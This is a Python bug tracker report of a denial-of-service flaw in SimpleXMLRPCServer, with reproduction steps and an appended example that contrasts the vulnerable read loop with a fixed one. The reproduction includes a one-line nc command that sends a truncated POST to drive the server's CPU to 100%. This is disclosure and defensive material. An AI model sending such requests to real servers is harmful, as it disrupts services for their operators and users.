Message153267
A denial of service flaw was found in the way the Simple XML-RPC Server module of Python processed client connections that were closed before the complete request body had been received. A remote attacker could use this flaw to cause a Python Simple XML-RPC based server process to consume an excessive amount of CPU.
Credit:
Issue reported by Daniel Callaghan
References:
[1] https://bugzilla.redhat.com/show_bug.cgi?id=789790
Steps to reproduce:
------------------
A) for v3.2.2 version:
1) start server:
cat s.py
#!/usr/local/bin/python3
from xmlrpc.server import SimpleXMLRPCServer
server = SimpleXMLRPCServer(('127.0.0.1', 12345))
server.serve_forever()
2) # top
3) issue request from client:
echo -e 'POST /RPC2 HTTP/1.0\r\nContent-Length: 100\r\n\r\nlol bye' | nc localhost 12345
Return to the 'top' screen and see how CPU consumption on the particular host quickly moves to 100%.
B) for v2.7.2 version:
1) start server:
cat s.py
#!/usr/bin/python
from SimpleXMLRPCServer import SimpleXMLRPCServer
server = SimpleXMLRPCServer(('127.0.0.1', 12345))
server.serve_forever()
Steps 2) and 3) for v2.7.2 version are identical to those for v3.2.2 version.

Date | User | Action | Args
2012-02-13 13:45:34 | iankko | set | recipients: + iankko
2012-02-13 13:45:34 | iankko | set | messageid: <1329140734.41.0.0376676358855.issue14001@psf.upfronthosting.co.za>
2012-02-13 13:45:33 | iankko | link | issue14001 messages
2012-02-13 13:45:32 | iankko | create |
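
The following is an added example, not part of the original message and not CPython's own code: it sketches how a Content-Length read loop without an end-of-file check keeps iterating once the client has closed the connection, next to a hardened loop that stops and reports the short body. It assumes the CPU spin comes from a chunked read loop of this shape; the names `spin_count` and `read_body` are hypothetical, and `io.BytesIO` stands in for the connection's read stream.

```python
import io

MAX_CHUNK = 10 * 1024 * 1024  # read the body in bounded chunks


def spin_count(rfile, content_length, limit=1000):
    """Loop without an EOF check; returns iterations used, capped at `limit`.

    Once the peer has closed, read() returns b"" and size_remaining never
    shrinks, so the real loop would never exit. The cap exists only so
    that this demonstration terminates.
    """
    size_remaining = content_length
    iterations = 0
    while size_remaining and iterations < limit:
        chunk = rfile.read(min(size_remaining, MAX_CHUNK))
        size_remaining -= len(chunk)
        iterations += 1
    return iterations


def read_body(rfile, content_length):
    """Hardened loop: stop at EOF and report whether the body was complete."""
    size_remaining = content_length
    parts = []
    while size_remaining:
        chunk = rfile.read(min(size_remaining, MAX_CHUNK))
        if not chunk:  # peer closed before sending Content-Length bytes
            break
        parts.append(chunk)
        size_remaining -= len(chunk)
    return b"".join(parts), size_remaining == 0


# Constructed input: the body from the report (8 bytes including the newline
# that echo appends) against the declared Content-Length of 100.
TRUNCATED = b"lol bye\n"
DECLARED = 100

if __name__ == "__main__":
    print("unchecked loop iterations:", spin_count(io.BytesIO(TRUNCATED), DECLARED))
    body, complete = read_body(io.BytesIO(TRUNCATED), DECLARED)
    print("hardened loop:", body, "complete =", complete)
```

A caller of `read_body` should reject the request when the second return value is false rather than pass the partial body on to the XML parser.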